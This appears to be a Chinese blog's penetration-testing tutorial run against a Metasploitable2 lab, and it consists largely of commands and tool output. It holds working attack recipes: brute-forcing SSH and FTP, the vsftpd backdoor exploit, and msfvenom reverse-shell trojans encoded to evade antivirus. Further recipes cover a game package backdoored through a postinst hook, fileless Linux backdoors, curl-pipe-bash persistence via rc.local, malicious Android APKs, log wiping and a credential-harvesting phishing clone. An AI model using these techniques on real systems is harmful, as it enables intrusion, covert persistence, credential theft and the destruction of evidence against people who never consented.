[*] Nmap: 512/tcp open exec netkit-rsh rexecd
[*] Nmap: 513/tcp open login
[*] Nmap: 514/tcp open tcpwrapped
[*] Nmap: 1099/tcp open java-rmi GNU Classpath grmiregistry
[*] Nmap: 1524/tcp open bindshell Metasploitable root shell
[*] Nmap: 2049/tcp open nfs 2-4 (RPC #100003)
[*] Nmap: 2121/tcp open ftp ProFTPD 1.3.1
[*] Nmap: 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
[*] Nmap: 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
[*] Nmap: 5900/tcp open vnc VNC (protocol 3.3)
[*] Nmap: 6000/tcp open X11 (access denied)
[*] Nmap: 6667/tcp open irc UnrealIRCd
[*] Nmap: 8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
[*] Nmap: 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
[*] Nmap: MAC Address: 00:0C:29:E3:33:5C (VMware)
[*] Nmap: Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.62 seconds

arp扫描

use auxiliary/scanner/discovery/arp_sweep

set RHOSTS 192.168.10.0/24

set THREADS 15 #根据cpu来设置扫描的线程，不是越大越好。

run

msf6 auxiliary(scanner/discovery/arp_sweep) > run

[+] 192.168.10.1 appears to be up (VMware, Inc.).
[+] 192.168.10.2 appears to be up (VMware, Inc.).
[+] 192.168.10.142 appears to be up (VMware, Inc.).
[+] 192.168.10.254 appears to be up (VMware, Inc.).
[+] 192.168.10.139 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

半连接扫描

search type:auxiliary name:syn

use auxiliary/scanner/portscan/syn

set RHOST 192.168.10.142

set THREADS 15

set PORTS 80,443

密码嗅探

search type:auxiliary name:psnuffle

use auxiliary/sniffer/psnuffle

run

另开终端登录142的ftp

apt -y install lftp

lftp -u msfadmin 192.168.10.142

msf6 auxiliary(sniffer/psnuffle) >
[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[!] *** auxiliary/sniffer/psnuffle is still calling the deprecated report_auth_info method! This needs to be updated!
[!] *** For detailed information about LoginScanners and the Credentials objects see:
[!] https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners
[!] https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-HTTP-LoginScanner-Module
[!] *** For examples of modules converted to just report credentials without report_auth_info, see:
[!] https://github.com/rapid7/metasploit-framework/pull/5376
[!] https://github.com/rapid7/metasploit-framework/pull/5377
[!] *** auxiliary/sniffer/psnuffle is still calling the deprecated report_auth_info method! This needs to be updated!
[!] *** For detailed information about LoginScanners and the Credentials objects see:
[!] https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners
[!] https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-HTTP-LoginScanner-Module
[!] *** For examples of modules converted to just report credentials without report_auth_info, see:
[!] https://github.com/rapid7/metasploit-framework/pull/5376
[!] https://github.com/rapid7/metasploit-framework/pull/5377
[!] *** auxiliary/sniffer/psnuffle is still calling the deprecated report_auth_info method! This needs to be updated!
[!] *** For detailed information about LoginScanners and the Credentials objects see:
[!] https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners
[!] https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-HTTP-LoginScanner-Module
[!] *** For examples of modules converted to just report credentials without report_auth_info, see:
[!] https://github.com/rapid7/metasploit-framework/pull/5376
[!] https://github.com/rapid7/metasploit-framework/pull/5377
[*] Successful FTP Login: 192.168.10.139:42140-192.168.10.142:21 >> msfadmin / msfadmin
[*] Successful FTP Login: 192.168.10.139:42140-192.168.10.142:21 >> msfadmin / msfadmin
[*] Successful FTP Login: 192.168.10.139:42140-192.168.10.142:21 >> msfadmin / msfadmin

ctrl + c 还是会在后台运行

jobs 列出

jobs -K 将后台任务全部kill

kill 0 杀死一个任务

kill 1,2 杀死两个任务

snmp协议收集

开放snmp服务

apt install snmpd
vi /etc/default/snmpd
SNMPDOPTS='-LSwd -Lf /dev/null -u Debian-snmp -g Debian-snmp -I -smux,mteTrigger,mteTriggerConf -p /run/snmpd.pid 0.0.0.0'
/etc/init.d/snmpd restart
ss -tunpl |grep 161

search snmp_enum

use auxiliary/scanner/snmp/snmp_enum

set RHOSTS 127.0.0.1

run

msf6 auxiliary(scanner/snmp/snmp_enum) > run

[+] 127.0.0.1, Connected.

[*] System information:

Host IP : 127.0.0.1
Hostname : kali
Description : Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (2022-11-07) x86_64
Contact : Me
Location : Sitting on the Dock of the Bay
Uptime snmp : 03:25:08.20
Uptime system : 00:01:40.23
System date : 2023-1-18 02:20:36.0

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

smb协议收集

search smb_version

use auxiliary/scanner/smb/smb_version

set RHOSTS 192.168.10.142, 192.168.10.141 #多个ip在逗号后面要加个空格

run

msf6 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.10.142:445 - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 192.168.10.142:445 - Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.10.142: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

search smb_enumshares #扫描目录信息

use auxiliary/scanner/smb/smb_enumshares

set RHOSTS 192.168.10.141

set SMBUser administrator

set SMBPass 123456

search smb_lookupsid #扫描用户信息

use auxiliary/scanner/smb/smb_lookupsid

ssh协议收集

search ssh_version

use auxiliary/scanner/ssh/ssh_version

set RHOSTS 192.168.10.142

run

msf6 auxiliary(scanner/ssh/ssh_version) > run

[+] 192.168.10.142:22 - SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1 ( service.version=4.7p1 openssh.comment=Debian-8ubuntu1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:4.7p1 os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=8.04 os.cpe23=cpe:/o:canonical:ubuntu_linux:8.04 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.10.142:22 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

ssh暴破

search ssh_login

use auxiliary/scanner/ssh/ssh_login

set RHOSTS 192.168.10.142

参数

set USERNAME root

set PASSWORD 1

PASS_FILE 密码字典

USER_FILE 用户名字典

USERPASS_FILE 用户名+密码

/usr/share/metasploit-framework/data/wordlists 自带字典路径

set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

run

[+] 192.168.10.142:22 - Success: 'root:1' 'uid=0(root) gid=0(root) groups=0(root) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] SSH session 1 opened (192.168.10.139:46817 -> 192.168.10.142:22) at 2023-01-18 06:30:03 -0500
[+] 192.168.10.142:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] SSH session 2 opened (192.168.10.139:43219 -> 192.168.10.142:22) at 2023-01-18 06:30:03 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

sessions

sessions -i 1

ftp协议收集

search ftp_version

use auxiliary/scanner/ftp/ftp_version

set RHOSTS 192.168.10.142

run

msf6 auxiliary(scanner/ftp/ftp_version) > run

[+] 192.168.10.142:21 - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.10.142:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

search vsFTPd

use exploit/unix/ftp/vsftpd_234_backdoor

set RHOSTS 192.168.10.142

run

\msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 192.168.10.142:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.10.142:21 - USER: 331 Please specify the password.
[+] 192.168.10.142:21 - Backdoor service has been spawned, handling...
[+] 192.168.10.142:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 3 opened (192.168.10.139:34883 -> 192.168.10.142:6200) at 2023-01-18 08:17:52 -0500

匿名ftp

search name:anonymous

use auxiliary/scanner/ftp/anonymous

set RHOSTS 192.168.10.142

run

msf6 auxiliary(scanner/ftp/anonymous) > run

[+] 192.168.10.142:21 - 192.168.10.142:21 - Anonymous READ (220 (vsFTPd 2.3.4))
[*] 192.168.10.142:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Anonymous READ 匿名只读权限
lftp -u anonymous 192.168.10.142

暴破ftp

search ftp_login

use auxiliary/scanner/ftp/ftp_login

set RHOSTS 192.168.10.142

set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

run

[+] 192.168.10.142:21 - 192.168.10.142:21 - Login Successful: msfadmin:msfadmin
[*] 192.168.10.142:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

客户端渗透

修改二进制中的特征字符或者加密使特征字符不可读而达到免杀

windows

获取windows shell

msfvenom是msfpayload与msfencode的结合体，可以用于生成木马程序，在目标机器执行并监听。

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.10.139 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/西瓜1.exe

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.10.139 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 20 |msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f exe -o /var/www/html/西瓜2.exe

systemctl start apache2

https://www.virscan.org

查验病毒

msfdb run

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.10.139

run

[*] Started reverse TCP handler on 192.168.10.139:4444
[*] Sending stage (175686 bytes) to 192.168.10.141
[*] Meterpreter session 1 opened (192.168.10.139:4444 -> 192.168.10.141:1030) at 2023-01-19 20:30:50 -0500

获取shell后

getuid

help 列出windows命令帮助

getsystem 提权

getuid

getpid 查看木马进程

reboot

screenshot

sysinfo

run vnc 远程监控

hashdump 导出密码

软件植入后门

植入至子程序里面，避免捆绑主程序被杀

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.10.139 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -x QvodTerminal.exe -f exe -o /var/www/html/QvodTerminal.exe

evasion生成木马

search evasion

set LPORT 5555

run

msf6 evasion(windows/windows_defender_exe) > run

[*] Compiled executable size: 4608
[+] VIR.exe stored at /root/.msf4/local/VIR.exe

启动监控

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.10.139

set LPORT 5555

run

0day漏洞CVE-2018-8174获取shell

git clone https://github.com/iBearcat/CVE-2018-8174_EXP.git

python CVE-2018-8174.py -u http://192.168.10.139/exploit.html -o hack.rtf -i 192.168.10.139 -p 4444

cp exploit.html /var/www/html

java环境漏洞获取shell

jre-7u17-windows-x64.exe

use exploit/multi/browser/java_jre17_driver_manager

show payloads

set payload payload/java/meterpreter/reverse_tcp

exploit

msf6 exploit(multi/browser/java_jre17_driver_manager) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/browser/java_jre17_driver_manager) >
[*] Started reverse TCP handler on 192.168.10.139:4444
[*] Using URL: http://192.168.10.139:8080/G41q3jz
[*] Server started.

宏病毒word获取shell

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.10.139 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe

启动监控

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.10.139

run

linux

获取linux shell

msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.10.139 LPORT=4444 -b "\x00" -i 10 -f elf -o /var/www/html/linux1

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set LHOST 192.168.10.139

run

[*] Started reverse TCP handler on 192.168.10.139:4444
[*] Sending stage (3045348 bytes) to 192.168.10.133
[*] Meterpreter session 5 opened (192.168.10.139:4444 -> 192.168.10.133:53998) at 2023-01-20 04:44:02 -0500

wget http://192.168.10.139/linux1

chmod a+x linux1

./linux

制作deb包

apt install --download-only -o=dir::cache=/root freesweep

不指定路径则下载到/var/cache/apt/archive

cd /root/archives

dpkg -x freesweep_1.0.2-1_amd64.deb freesweep

msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.10.139 LPORT=4444 -b "\x00" -i 10 -f elf -o /root/archives/freesweep/usr/games/freesweepb

制作版本描述信息，如果没有可能打包出问题

mkdir /root/archives/freesweep/DEBIAN && cd /root/archives/freesweep/DEBIAN

tee /root/archives/freesweep/DEBIAN/control <<'EOF'
Package:freesweep
Version:1.0.2-1
Section:Games and Amusement
Priority:optional
Architecture:amd64
Maintainer:Ubuntu MOTU Developers
Description:a text-base minesweepr
Freesweep is an implementation of the game.
EOF

制作安装后运行后门程序的脚本

tee /root/archives/freesweep/DEBIAN/postinst <<'EOF'
#!/bin/bash
sudo chmod 2755 /usr/games/freesweepb
sudo /usr/games/freesweepb &
EOF

chmod 755 /root/archives/freesweep/DEBIAN/postinst

dpkg-deb --build /root/archives/freesweep/

cp /root/archives/freesweep.deb /var/www/html

启动监听

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set LHOST 192.168.10.139

run

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.10.139:4444
[*] Sending stage (3045348 bytes) to 192.168.10.139
[*] Meterpreter session 7 opened (192.168.10.139:4444 -> 192.168.10.139:39722) at 2023-01-20 08:35:31 -0500

安装软件即会接收监听

dpkg -i freesweep.deb

卸载也会保持控制，关机后会断开

dpkg -r freesweep

linux无文件木马

建立连接会话

msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.10.139 LPORT=8080 -b "\x00" -f elf -o /var/www/html/backdoor1

无文件木马程序

msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.10.139 LPORT=4444 -b "\x00" -f elf -o /var/www/html/backdoorghost

vegile隐藏后门

git clone https://github.com/Screetsec/Vegile.git

./Vgile --i

./Vgile --u

木马文件需要放在Vgile目录下

cp -r ~/Vegile /var/www/html/

cp /var/www/html/backdoorghost /var/www/html/Vegile

wget http://192.168.10.139/backdoorghost

先通过8080控制

use exploit/multi/handler

set payload linux/x64/shell/reverse_tcp

set LHOST 192.168.10.139

set LPORT 8080

exploit -j

建立8080后可以在kali中控制

wget -r http://192.168.10.139/Vegile

chmod +x Vegile

chmod +x backdoorghost

echo "" >/etc/ld.so.preload

./Vegile --i backdoorghost

use exploit/multi/handler

set payload linux/x64/shell/reverse_tcp

set LHOST 192.168.10.139

set LPORT 4444

exploit -j

msf6 exploit(multi/handler) >
[*] Sending stage (38 bytes) to 192.168.10.133
[*] Command shell session 1 opened (192.168.10.139:4444 -> 192.168.10.133:34200) at 2023-01-22 01:38:39 -0500

建立4444连接后可以删除Vegile

远程运行脚本

bash <(curl -s -L http://192.168.10.139/xx.sh) >> /dev/null 2>&1

追加开机启动

bash <(curl -s -L http://192.168.10.139/xx.sh) >> /dev/null 2>&1 >> /etc/rc.d/rc.local

chmod +x /etc/rc.d/rc.local

安卓渗透

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.139 LPORT=4444 R > vir.apk

cp vir.apk /var/www/html

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST 192.168.10.139

run

help

webcam_list

dump_sms

dump_contacts

渗透思路：将payload注入到正常的apk中，构建一个没有密码的钓鱼WiFi，需要安装apk才能上网。

Evil-Droid植入木马

日志清理

windows下

meterpreter> clearev

shell

del %WINDIR%\*.log /a/s/q/f

linux下

需要根据不同发行版本清理日志文件

history -c

vi /etc/profile HISTSIZE 修改为0

echo > /var/log/btmp 清空访问失败日志

echo > /var/log/wtmp 清空访问成功日志

echo > /var/log/secure 清空访问安全日志

克隆网站

搭建metasploitable2靶场

httrack，httrack工具，对网站进行克隆

Enter project name :dvwa

Base path (return=/root/websites/) :/root/dvwa

Enter URLs (separated by commas or blank spaces) :http://192.168.10.142/dvwa

Action:

(enter) 1 Mirror Web Site(s)

2 Mirror Web Site(s) with Wizard

3 Just Get Files Indicated

4 Mirror ALL links in URLs (Multiple Mirror)

5 Test Links In URLs (Bookmark Test)

0 Quit

: 2

Proxy (return=none) :

需要代理到https://www.hidemyass.com

You can define wildcards, like: -*.gif +www.*.com/*.zip -*img_*.zip

Wildcards (return=none) :192.168.10.142/dvwa/*

You can define additional options, such as recurse level (-r), separated by blank spaces

To see the option list, type help

Additional options (return=none) :

---> Wizard command line: httrack http://192.168.10.142/dvwa -W -O "/root/dvwa/dvwa" -%v *

Ready to launch the mirror? (Y/n) :

setoolkit克隆指定页面制作钓鱼网站

setoolkit

Select from the menu:

1) Social-Engineering Attacks 社工

2) Penetration Testing (Fast-Track) 渗透测试快速通道

3) Third Party Modules 第三方模块

4) Update the Social-Engineer Toolkit 更新社工工具包

5) Update SET configuration 更新set配置

1--2--3--2

监听ip地址192.168.10.139

Enter the url to clone:http://192.168.10.142/dvwa

需要先关掉占用139的80端口的apache或nginx

[*] Harvester is ready, have victim browse to your site.

192.168.10.1 - - [22/Jan/2023 10:04:14] "GET /dvwa/ HTTP/1.1" 404 -

192.168.10.1 - - [22/Jan/2023 10:04:17] "GET / HTTP/1.1" 200 -

[*] WE GOT A HIT! Printing the output:

POSSIBLE USERNAME FIELD FOUND: username=admin

POSSIBLE PASSWORD FIELD FOUND: password=password

POSSIBLE USERNAME FIELD FOUND: Login=Login

[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

kali-linux

模板简介

猜你喜欢

相关文章